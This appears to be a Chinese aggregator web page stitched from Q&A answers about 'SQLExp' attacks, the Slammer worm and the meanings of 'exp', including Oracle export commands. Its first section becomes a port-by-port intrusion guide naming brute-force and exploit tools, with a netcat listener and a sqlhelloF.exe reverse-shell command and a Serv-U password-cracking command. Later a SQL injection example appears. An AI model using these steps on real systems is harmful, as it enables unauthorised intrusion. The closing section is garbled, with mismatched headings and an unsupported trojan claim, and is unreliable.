本文目录一览:
怎样应对SQLExp攻击
只开放必要的端口,关闭其余端口.因为在系统安装好后缺省情况下,一般都有缺省的端口对外开放, 黑客就会利用扫描工具扫描那些端口可以利用,这对安全是一个严重威胁。 端口 协议 应用程序 21 TCP FTP 25 TCP SMTP 53 TCP DNS 80 TCP HTTP SERVER 1433 TCP SQL SERVER 5631 TCP PCANYWHERE 5632 UDP PCANYWHERE 6(非端口) IP协议 8(非端口) IP协议 将下面的端口关闭 TCP 21 22 23 25 TCP SMTP 53 TCP DNS 80 135 epmap 138 [冲击波] 139 smb 445 1025 DCE/1ff70682-0a51-30e8-076d-740be8cee98b 1026 DCE/12345778-1234-abcd-ef00-0123456789ac 1433 TCP SQL SERVER 5631 TCP PCANYWHERE 5632 UDP PCANYWHERE 3389 4444[冲击波] 4489 UDP 67[冲击波] 137 netbios-ns 161 An SNMP Agent is running/ Default community names of the SNMP Agent 端口入侵: 1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后SQLTools.exe入侵 对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(小榕的注入软件)。 5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
SQLExp是什么文件,为什么黑客老攻击它如题 谢谢了
“蠕虫王”是一个极为罕见且极其短小的蠕虫病毒,英文名为Worm.SQLexp.376,主要通过 Microsoft SQL Server的漏洞发动攻击,极具破坏力。 蠕虫王蠕虫病毒仅在内存中传播,没有文件载体,其长度仅有376字节。但其传播速度 极快,且使用广播数据包方式发送自身代码,每次均攻击子网中所有可能存在机器。易受 “蠕虫王”攻击的机器类型为所有安装有Microsoft SQL Server 2000并且没有修补漏洞的 NT系列服务器,包括WinNT/Win2000/WinXP等,不会感染Win9X系统。由于蠕虫王并不对是 否已经侵入系统作判定,所以其不停的入侵将会造成拒绝服务式攻击,从而导致被攻击机 器因瘫痪而停止服务,危害极为惊人。
SQLExp攻击
SQLExp攻击
即利用 构造的sql语句进行攻击/溢出,常见的方式有:穷举,暴库 等等。都是利用sql的部分敏感语句过滤不严格造成的。
假如你装了sql 并开了1433,就可以通过命令:sql.exe 你的IP
如果成功溢出的话,会反回一个shell,就像在你的电脑里使用cmd 里的操作一样!
穷举法例如:http://**************************code=1and1=1或者or 1=1
因为1=1永远成立 返回正常页面和不正常页面的差别就可以判断code是不是=1
这是非常笨的方法 但是原理一样。(详细步骤不便在此讲明)
至于你所说的 你如果是PC的话,没什么事,那只是黑客进行大范围扫描,偶尔扫过你的机器而已。但是你要是服务器的话就小心了
exp是什么意思?
1、exp(语言函数)
exp,高等数学里以自然常数e为底的指数函数,它同时又是航模名词,全称Exponential(指数曲线)。在医药说明中,EXP是指使用期限,即Expiry date(Exp date) 。
除此之外,EXP(Expedition) 是世界著名项目管理软件供应商美国Primavera公司的主要产品之一,是国际规范的施工管理和合同及建设信息管理软件。exp还指行业软件的高级专家版,在灵活性和功能上比专业版(pro)更加强大,也更加复杂。
2、exp(游戏中的经验值)
由LIB工具从DEF文件生成的输出文件,其中包含了函数和数据项目的输出信息,LINK工具将使用EXP文件来创建动态链接库。Oracle数据库的命令,用来导出数据
EXP.EXE是一个木马程序。这个木马运行攻击者访问你的计算机,窃取密码和个人数据。这个进程的安全等级是建议立即进行删除。
3、exp(项目管理软件供应商)
Expedition(简称:EXP) :是世界著名项目管理软件供应商- - -美国Primavera公司的主要产品之一,是国际规范的施工管理和合同及建设信息管理软件,它完全按FIDIC的合同管理模式以合同管理为中心有机地管理合同的履行过程,它全面归纳了建设项目合同管理的事务。
通过业务梳理,分类统计,关联管理,跟踪催办,使得原本散落在各个部门和各个人案头,柜子中的所有合同台帐,费用往来,文件往来,进度款付款凭证,变更及其处理过程记录,施工图纸记录等等,统统有条不紊地记载到Expedition软件中;使一切变得有章可循。
4、exp(操作系统命令行工具)
导入(IMP)/导出(EXP)是ORACLE幸存的最古老的两个操作系统命令行工具,Exp/Imp是一个好的转储工具,特别是在小型数据库的转储,表空间的迁移,表的抽取,检测逻辑和物理冲突等中有不小的功劳。它作为小型数据库的物理备份后的一个逻辑辅助备份,也是不错的手段。
对于越来越大的数据库,特别是TB级数据库和越来越多数据仓库的出现,EXP/IMP越来越力不从心了,这个时候,数据库的备份都转向了RMAN和第三方工具。
5、exp(使用期限)
EXP是指使用期限,即Expiry date(Exp date)。
扩展资料
常用选项
1、FULL,这个用于导出整个数据库,在ROWS=N一起使用时,可以导出整个数据库的结构。例如:
exp userid=test/test file=./db_str.dmplog=./db_str.log full=y rows=n compress=y direct=y
2、OWNER和TABLE,这两个选项用于定义EXP的对象。OWNER定义导出指定用户的对象;TABLE指定EXP的table名称,例如:
exp userid=test/test file=./db_str.dmplog=./db_str.log owner=duanl
exp userid=test/test file=./db_str.dmp log=./db_str.logtable=nc_data,fi_arap
3、BUFFER和FEEDBACK,在导出比较多的数据时,我会考虑设置这两个参数。例如:
exp userid=test/test file=yw97_2003.dmplog=yw97_2003_3.log feedback=10000 buffer=100000000 tables=WO4,OK_YT
4、FILE和LOG,这两个参数分别指定备份的DMP名称和LOG名称,包括文件名和目录,例子见上面。
5、COMPRESS参数不压缩导出数据的内容。用来控制导出对象的storage语句如何产生。默认值为Y,使用默认值,对象的存储语句的init extent等于当前导出对象的extent的总和。推荐使用COMPRESS=N。
6、FILESIZE该选项在8i中可用。如果导出的dmp文件过大时,最好使用FILESIZE参数,限制文件大小不要超过2G。如:
exp userid=duanl/duanl file=f1,f2,f3,f4,f5filesize=2G owner=scott
这样将创建f1.dmp,f2.dmp等一系列文件,每个大小都为2G,如果导出的总量小于10GEXP不必创建f5.dmp。